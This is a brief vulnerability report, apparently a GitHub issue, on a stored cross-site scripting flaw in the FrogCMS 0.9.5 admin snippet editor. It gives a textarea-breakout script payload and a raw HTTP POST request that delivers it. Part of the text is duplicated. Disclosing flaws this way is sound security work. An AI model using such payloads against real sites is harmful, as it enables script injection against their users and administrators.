I have found a stored Cross Site Scripting Vulnerability.
log into the system as an administrator role:http://127.0.0.1/test/FrogCMS-master/admin/
publish an article,and you can click it.
snippet-->Edit snippet-->Name
payload:</textarea>"/><script>confirm(1234)</script><textarea>
save it.
i think you can see the following picture to konw more.
I have found a stored Cross Site Scripting Vulnerability.
log into the system as an administrator role:http://127.0.0.1/test/FrogCMS-master/admin/
publish an article,and you can click it.
snippet-->Edit snippet-->Name
payload:</textarea>"/><script>confirm(1234)</script><textarea>
save it.
i think you can see the following picture to konw more.
exp:
POST /test/FrogCMS-master/admin/?/snippet/edit/3 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/test/FrogCMS-master/admin/?/snippet/edit/3
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
Cookie: current_tab=:tab-1; expanded_rows=4; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6; frog_auth_user=exp%3D1525680458%26id%3D1%26digest%3D5a4183bf1c5de0fa91a7f31422e9a38e
Connection: keep-alive
Upgrade-Insecure-Requests: 1
snippet%5Bname%5D=</textarea>"/><script>confirm(1234)</script><textarea>&commit=Save



Affected Version:
0.9.5
The text was updated successfully, but these errors were encountered: